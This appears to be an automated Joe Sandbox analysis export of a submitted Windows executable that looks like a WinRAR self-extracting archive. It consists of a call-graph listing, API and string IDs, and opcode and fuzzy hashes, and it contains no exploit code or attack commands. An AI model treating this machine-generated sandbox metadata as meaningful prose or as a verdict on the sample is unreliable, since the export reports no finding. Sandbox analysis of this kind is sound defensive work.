28080->28076 28162 7ff6ca9d51a4 28080->28162 28082 7ff6ca9de4e5 28081->28082 28086 7ff6ca9c1fa0 31 API calls 28082->28086 28087 7ff6ca9de656 28083->28087 28084->28074 28088 7ff6ca9de7d5 28085->28088 28086->28055 28089 7ff6ca9de706 28087->28089 28096 7ff6ca9de661 28087->28096 28091 7ff6ca9f2320 _handle_error 8 API calls 28088->28091 28092 7ff6ca9dda98 48 API calls 28089->28092 28090->28074 28093 7ff6ca9de7e4 28091->28093 28094 7ff6ca9de74b AllocConsole 28092->28094 28093->27933 28097 7ff6ca9de755 GetCurrentProcessId AttachConsole 28094->28097 28098 7ff6ca9de6fb 28094->28098 28095->28074 28102 7ff6ca9daae0 48 API calls 28096->28102 28099 7ff6ca9de76c 28097->28099 28172 7ff6ca9c19e0 31 API calls _invalid_parameter_noinfo_noreturn 28098->28172 28107 7ff6ca9de778 GetStdHandle WriteConsoleW Sleep FreeConsole 28099->28107 28100->28074 28104 7ff6ca9de6a5 28102->28104 28103 7ff6ca9de7b9 ExitProcess 28106 7ff6ca9dda98 48 API calls 28104->28106 28105->28070 28105->28071 28108 7ff6ca9de6c3 28106->28108 28107->28098 28109 7ff6ca9daae0 48 API calls 28108->28109 28110 7ff6ca9de6ce 28109->28110 28170 7ff6ca9ddc2c 33 API calls 
28110->28170 28112 7ff6ca9de6da 28171 7ff6ca9c19e0 31 API calls _invalid_parameter_noinfo_noreturn 28112->28171 28115 7ff6ca9ddd88 28114->28115 28116 7ff6ca9e9481 OleInitialize 28115->28116 28117 7ff6ca9e94a7 28116->28117 28118 7ff6ca9e94cd SHGetMalloc 28117->28118 28118->27936 28120 7ff6ca9e9a49 28119->28120 28122 7ff6ca9e9a4e BuildCatchObjectHelperInternal 28119->28122 28121 7ff6ca9c1fa0 31 API calls 28120->28121 28121->28122 28123 7ff6ca9c1fa0 31 API calls 28122->28123 28124 7ff6ca9e9a7d BuildCatchObjectHelperInternal 28122->28124 28123->28124 28125 7ff6ca9c1fa0 31 API calls 28124->28125 28128 7ff6ca9e9aac BuildCatchObjectHelperInternal 28124->28128 28125->28128 28126 7ff6ca9c1fa0 31 API calls 28127 7ff6ca9e9adb BuildCatchObjectHelperInternal 28126->28127 28127->27941 28128->28126 28128->28127 28130 7ff6ca9eb03e 28129->28130 28134 7ff6ca9eb046 28129->28134 28174 7ff6ca9e8624 FindResourceExW 28130->28174 28132 7ff6ca9eb063 28135 7ff6ca9e849c 4 API calls 28132->28135 28133 7ff6ca9eb04e GetObjectW 28133->28132 28134->28132 28134->28133 28136 7ff6ca9eb078 28135->28136 28137 7ff6ca9eb08a 28136->28137 28139 7ff6ca9e8624 11 API calls 28136->28139 28144 7ff6ca9eb0bf 28136->28144 28189 7ff6ca9e8504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28137->28189 28139->28137 28140 7ff6ca9eb0a7 28141 7ff6ca9e84cc 4 API calls 28140->28141 28142 7ff6ca9eb0b2 28141->28142 28190 7ff6ca9e8df4 15 API calls _handle_error 28142->28190 28144->27966 28191 7ff6ca9d98dc 28145->28191 28147 7ff6ca9d98ba 28258 7ff6ca9da43c GetModuleHandleW FindResourceW 28147->28258 28149 7ff6ca9d98c2 28149->27971 28151 7ff6ca9f21d0 33 API calls 28150->28151 28152 7ff6ca9e67fa 28151->28152 28152->27978 28153->27959 28154->27977 28155->27982 28156->27985 28157->27988 28158->27979 28159->27994 28161 7ff6ca9f247a 28160->28161 28161->28039 28161->28161 28163 7ff6ca9d51c8 GetVersionExW 28162->28163 28164 7ff6ca9d51fb 28162->28164 28163->28164 28165 7ff6ca9f2320 _handle_error 8 API calls 28164->28165 28166 
7ff6ca9d5228 28165->28166 28166->28080 28167->28049 28168->28072 28169->28078 28170->28112 28171->28098 28172->28103 28173->28064 28175 7ff6ca9e879b 28174->28175 28176 7ff6ca9e864f SizeofResource 28174->28176 28175->28134 28176->28175 28177 7ff6ca9e8669 LoadResource 28176->28177 28177->28175 28178 7ff6ca9e8682 LockResource 28177->28178 28178->28175 28179 7ff6ca9e8697 GlobalAlloc 28178->28179 28179->28175 28180 7ff6ca9e86b8 GlobalLock 28179->28180 28181 7ff6ca9e8792 GlobalFree 28180->28181 28182 7ff6ca9e86ca BuildCatchObjectHelperInternal 28180->28182 28181->28175 28183 7ff6ca9e86d8 CreateStreamOnHGlobal 28182->28183 28184 7ff6ca9e8789 GlobalUnlock 28183->28184 28185 7ff6ca9e86f6 GdipAlloc 28183->28185 28184->28181 28186 7ff6ca9e870b 28185->28186 28186->28184 28187 7ff6ca9e8772 28186->28187 28188 7ff6ca9e875a GdipCreateHBITMAPFromBitmap 28186->28188 28187->28184 28188->28187 28189->28140 28190->28144 28194 7ff6ca9d98fe _snwprintf 28191->28194 28192 7ff6ca9d9973 28268 7ff6ca9d68b0 48 API calls 28192->28268 28194->28192 28195 7ff6ca9d9a89 28194->28195 28198 7ff6ca9d99fd 28195->28198 28200 7ff6ca9c20b0 33 API calls 28195->28200 28196 7ff6ca9c1fa0 31 API calls 28196->28198 28197 7ff6ca9d997d BuildCatchObjectHelperInternal 28197->28196 28199 7ff6ca9da42e 28197->28199 28202 7ff6ca9d24c0 54 API calls 28198->28202 28201 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 28199->28201 28200->28198 28203 7ff6ca9da434 28201->28203 28204 7ff6ca9d9a1a 28202->28204 28205 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 28203->28205 28206 7ff6ca9d9a22 28204->28206 28214 7ff6ca9d9aad 28204->28214 28207 7ff6ca9da43a 28205->28207 28208 7ff6ca9d204c 100 API calls 28206->28208 28211 7ff6ca9d9a2b 28208->28211 28209 7ff6ca9d9b17 28260 7ff6ca9fa450 28209->28260 28211->28203 28213 7ff6ca9d9a66 28211->28213 28217 7ff6ca9f2320 _handle_error 8 API calls 28213->28217 28214->28209 28215 7ff6ca9d8e58 33 API calls 28214->28215 28215->28214 28216 7ff6ca9fa450 31 API calls 
28229 7ff6ca9d9b57 __vcrt_FlsAlloc 28216->28229 28218 7ff6ca9da40e 28217->28218 28218->28147 28219 7ff6ca9d9c89 28220 7ff6ca9d2aa0 101 API calls 28219->28220 28232 7ff6ca9d9d5c 28219->28232 28223 7ff6ca9d9ca1 28220->28223 28221 7ff6ca9d2bb0 101 API calls 28221->28229 28222 7ff6ca9d28d0 104 API calls 28222->28229 28226 7ff6ca9d28d0 104 API calls 28223->28226 28223->28232 28224 7ff6ca9d204c 100 API calls 28227 7ff6ca9da3f5 28224->28227 28225 7ff6ca9d2aa0 101 API calls 28225->28229 28230 7ff6ca9d9cc9 28226->28230 28228 7ff6ca9c1fa0 31 API calls 28227->28228 28228->28213 28229->28219 28229->28221 28229->28222 28229->28225 28229->28232 28230->28232 28252 7ff6ca9d9cd7 __vcrt_FlsAlloc 28230->28252 28269 7ff6ca9e0bbc MultiByteToWideChar 28230->28269 28232->28224 28233 7ff6ca9da1ec 28248 7ff6ca9da2c2 28233->28248 28275 7ff6ca9fcf90 31 API calls 2 library calls 28233->28275 28235 7ff6ca9da157 28235->28233 28272 7ff6ca9fcf90 31 API calls 2 library calls 28235->28272 28236 7ff6ca9da14b 28236->28147 28239 7ff6ca9da249 28276 7ff6ca9fb7bc 31 API calls _invalid_parameter_noinfo_noreturn 28239->28276 28240 7ff6ca9da3a2 28242 7ff6ca9fa450 31 API calls 28240->28242 28241 7ff6ca9da2ae 28241->28248 28277 7ff6ca9d8cd0 33 API calls 2 library calls 28241->28277 28245 7ff6ca9da3cb 28242->28245 28243 7ff6ca9d8e58 33 API calls 28243->28248 28246 7ff6ca9fa450 31 API calls 28245->28246 28246->28232 28248->28240 28248->28243 28249 7ff6ca9da16d 28273 7ff6ca9fb7bc 31 API calls _invalid_parameter_noinfo_noreturn 28249->28273 28250 7ff6ca9da1d8 28250->28233 28274 7ff6ca9d8cd0 33 API calls 2 library calls 28250->28274 28252->28232 28252->28233 28252->28235 28252->28236 28253 7ff6ca9da429 28252->28253 28255 7ff6ca9e0f68 WideCharToMultiByte 28252->28255 28270 7ff6ca9daa88 45 API calls _snwprintf 28252->28270 28271 7ff6ca9fa270 31 API calls 2 library calls 28252->28271 28278 7ff6ca9f2624 8 API calls 28253->28278 28255->28252 28259 7ff6ca9da468 28258->28259 28259->28149 28261 7ff6ca9fa47d 28260->28261 
28267 7ff6ca9fa492 28261->28267 28279 7ff6ca9fd69c 15 API calls _set_errno_from_matherr 28261->28279 28263 7ff6ca9fa487 28280 7ff6ca9f78e4 31 API calls _invalid_parameter_noinfo 28263->28280 28265 7ff6ca9f2320 _handle_error 8 API calls 28266 7ff6ca9d9b37 28265->28266 28266->28216 28267->28265 28268->28197 28269->28252 28270->28252 28271->28252 28272->28249 28273->28250 28274->28233 28275->28239 28276->28241 28277->28248 28278->28199 28279->28263 28280->28267 28281 7ff6ca9fd94c 28282 7ff6ca9fd997 28281->28282 28286 7ff6ca9fd95b _set_errno_from_matherr 28281->28286 28288 7ff6ca9fd69c 15 API calls _set_errno_from_matherr 28282->28288 28283 7ff6ca9fd97e HeapAlloc 28285 7ff6ca9fd995 28283->28285 28283->28286 28286->28282 28286->28283 28287 7ff6ca9fbbc0 _set_errno_from_matherr 2 API calls 28286->28287 28287->28286 28288->28285
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Item$Message$_invalid_parameter_noinfo_noreturn$Send$Text$File$ErrorLast$CloseDialogFindFocusLoadStringViewWindow$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleIdleInputLineMappingParamShellSleepTickTranslateUnmapWait
                                                  • String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
                                                  • API String ID: 2843345789-2702805183
                                                  • Opcode ID: 317428d4b19d084f719261a9800a4b17a93305193fd4149ad68c101a36b4f32a
                                                  • Instruction ID: 24f32671a31662884ee3bb8c0f88a70876f5402d79fa93014712c2a8d3102f1a
                                                  • Opcode Fuzzy Hash: 317428d4b19d084f719261a9800a4b17a93305193fd4149ad68c101a36b4f32a
                                                  • Instruction Fuzzy Hash: 9ED2E421A2868281EA20DF65F8662FA6361FF86782F404275D9CDC76E7DF3CE645C740
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$FileMessageMoveSend$ItemPathTemp
                                                  • String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
                                                  • API String ID: 1275900774-3916287355
                                                  • Opcode ID: b617cc49474659d662a38eebf4ae2d5fc66c2f0afa935848dd26c524c1edde4e
                                                  • Instruction ID: 182eb61dd6fe6bc99bbf1f273cdabe0f6009ab24898cd70f40df8418798fd010
                                                  • Opcode Fuzzy Hash: b617cc49474659d662a38eebf4ae2d5fc66c2f0afa935848dd26c524c1edde4e
                                                  • Instruction Fuzzy Hash: BC13B032A24B8299EB10DF64E8622EC27B1FB40399F500575DA9DD7AEBDF38D585C340

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
control_flow_graph for 7ff6ca9f0754 (rendered as a graph on the original page; the basic-block listing is not reproduced here). Path through the function: the entry block 7ff6ca9f0754-7ff6ca9f0829 calls 7ff6ca9ddfd0, 7ff6ca9d62dc, 7ff6ca9e946c, 7ff6ca9f3cf0 and 7ff6ca9e9a14; block 7ff6ca9f096e calls GetCommandLineW. One branch (7ff6ca9f09f9 onward) calls OpenFileMappingW, MapViewOfFile, UnmapViewOfFile, MapViewOfFile, UnmapViewOfFile and CloseHandle; the other (7ff6ca9f0b89 onward) calls SetEnvironmentVariableW, GetLocalTime, 7ff6ca9d3e28, SetEnvironmentVariableW, GetModuleHandleW, LoadIconW, 7ff6ca9eb014, 7ff6ca9d98ac, 7ff6ca9e67b4 (twice), DialogBoxParamW and 7ff6ca9e68a8, then Sleep (7ff6ca9f0ce6), 7ff6ca9efe24 and CloseHandle (7ff6ca9f0d5b) before returning through 7ff6ca9e94e4 and 7ff6ca9f2320. Error paths go through 7ff6ca9f7904 (_invalid_parameter_noinfo_noreturn) and 7ff6ca9f1900 (_com_raise_error).
                                                  Similarity
                                                  • API ID: File$EnvironmentHandleVariableView$_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDirectoryModuleProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
                                                  • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                  • API String ID: 3400486126-3710569615
                                                  • Opcode ID: 2d4a4130c046c56cdd5081655fe00bd0fcd3280ef1f87c25077d8b113e32ed81
                                                  • Instruction ID: f2827d0ea797e8e101b0599d89229e064e300529c6d5fda3103bb9a82c618bf9
                                                  • Opcode Fuzzy Hash: 2d4a4130c046c56cdd5081655fe00bd0fcd3280ef1f87c25077d8b113e32ed81
                                                  • Instruction Fuzzy Hash: 9912A531A18B8285EB109F65FC662B96361FF84786F404275EADDC7AA6EF3CE151C700

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWideswprintf
                                                  • String ID: $%s:$CAPTION
                                                  • API String ID: 2100155373-404845831
                                                  • Opcode ID: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                                                  • Instruction ID: 6c806a09204ae6b2bb9ee29a65141d054cf9f85b9eb7327a12aaee393da76677
                                                  • Opcode Fuzzy Hash: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                                                  • Instruction Fuzzy Hash: 6D912B32B2864186E714CF79F815669ABA1F784B85F405535EE8E87B99CF3CE846CB00

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                  • String ID: PNG
                                                  • API String ID: 211097158-364855578
                                                  • Opcode ID: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
                                                  • Instruction ID: 26edf098170ee7c13d2bbea8b973bd8b48c2c3d61c2e88cc52e5867997edbb65
                                                  • Opcode Fuzzy Hash: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
                                                  • Instruction Fuzzy Hash: EB417121B19B4685EF048F96F86837963A0BF88B92F044475CD8EC7366EF3DE44A8340
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                  • String ID: __tmp_reference_source_
                                                  • API String ID: 3668304517-685763994
                                                  • Opcode ID: 0d642c38542e598360b72acbf0b8d61d3a64b3198fda17bd5702d85f02ad7b07
                                                  • Instruction ID: 4a6dc2e4330f125630ffa2246b4fa0a1f0450b8dc977f3f0f054255a2c7f544a
                                                  • Opcode Fuzzy Hash: 0d642c38542e598360b72acbf0b8d61d3a64b3198fda17bd5702d85f02ad7b07
                                                  • Instruction Fuzzy Hash: 83E2B462A286C242EA24DF25F1623AE6761FB81785F504176DBDEC36A7CF3CE495C700

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Token$DescriptorInformationProcessSecurity$CopyCreateCurrentDaclDirectoryEntriesErrorFreeInitializeLastLocalOpen
                                                  • String ID:
                                                  • API String ID: 2740647886-0
                                                  • Opcode ID: decc2da6846149065e747433b686ffe20880dedc2611ac47de6390cb5f5191d4
                                                  • Instruction ID: ff81b82abe3987cac41dfd3e34c3393a30fe286648f4d5f8188c4394ea1a3395
                                                  • Opcode Fuzzy Hash: decc2da6846149065e747433b686ffe20880dedc2611ac47de6390cb5f5191d4
                                                  • Instruction Fuzzy Hash: DB51D232628B8286E7508FA1F8547ADB7B4FB88B85F500135EA8E97B55DF3CD445CB40
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                  • String ID: CMT
                                                  • API String ID: 3668304517-2756464174
                                                  • Opcode ID: 1fdd01db6e3aa44ea001be8250f3d4473abea029c39917a2ebd0d9ae72df00d0
                                                  • Instruction ID: 913e9021f90f946daeca8114f61d885355bd335e43d50dc3404b918bca697d8a
                                                  • Opcode Fuzzy Hash: 1fdd01db6e3aa44ea001be8250f3d4473abea029c39917a2ebd0d9ae72df00d0
                                                  • Instruction Fuzzy Hash: C3E20322B28A8286EB18EF75E4662FD67A1FB44789F404075DA9EC3697DF3CE055C300

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
                                                  • String ID:
                                                  • API String ID: 474548282-0
                                                  • Opcode ID: e00911ed99825cb93216281e8042c5d8089b28651dbc7c90a12e2ff066408ff5
                                                  • Instruction ID: 1101e94f7e9aa1a77f24888264b7e80292c380bffbdde0b35e3fe964680f70d3
                                                  • Opcode Fuzzy Hash: e00911ed99825cb93216281e8042c5d8089b28651dbc7c90a12e2ff066408ff5
                                                  • Instruction Fuzzy Hash: 7961D662A28A4281DA10DF28F8A627D6361FB957A5F104375EAFDC36DADF3CD485C700
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: CMT
                                                  • API String ID: 0-2756464174
                                                  • Opcode ID: 8928320ae6cd716fc977bb68eff86db0b2a70291441e82f998a9964a40b9c2b9
                                                  • Instruction ID: a8db2d91175bcd0e0174774dbd0bca0134083cfa9138762753acd59282d4f7b5
                                                  • Opcode Fuzzy Hash: 8928320ae6cd716fc977bb68eff86db0b2a70291441e82f998a9964a40b9c2b9
                                                  • Instruction Fuzzy Hash: CA42D022B28A8196EB18EF74E1622FD67A1EB41349F0011B5DB9ED3697DF3CE559C300
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 00cc9b5d49baee892d39d1da46008d2b4229947a5b0a2c39888c4d08721f4c94
                                                  • Instruction ID: efbbdca3d94f27a5a7689730f41f2b52292adeaf78044f5c213916d3c61d9c99
                                                  • Opcode Fuzzy Hash: 00cc9b5d49baee892d39d1da46008d2b4229947a5b0a2c39888c4d08721f4c94
                                                  • Instruction Fuzzy Hash: D3E10322A182828AEB60CF28B4662BD7790FB84749F054179DBCED7787CE3DE581C744
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8c3f9089be966249862bf56ce032710d6eb03eb50aa34be6e58aa05575d530c2
                                                  • Instruction ID: 3d1e9539036058e76cac4baab5e03012ca185695bb441bdeea7727cec419a48f
                                                  • Opcode Fuzzy Hash: 8c3f9089be966249862bf56ce032710d6eb03eb50aa34be6e58aa05575d530c2
                                                  • Instruction Fuzzy Hash: 0EB1E1A2B14AC9A2DE58CE66E5197EA7391B705FC5F448032DE8D8B742DF3CE155C340
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
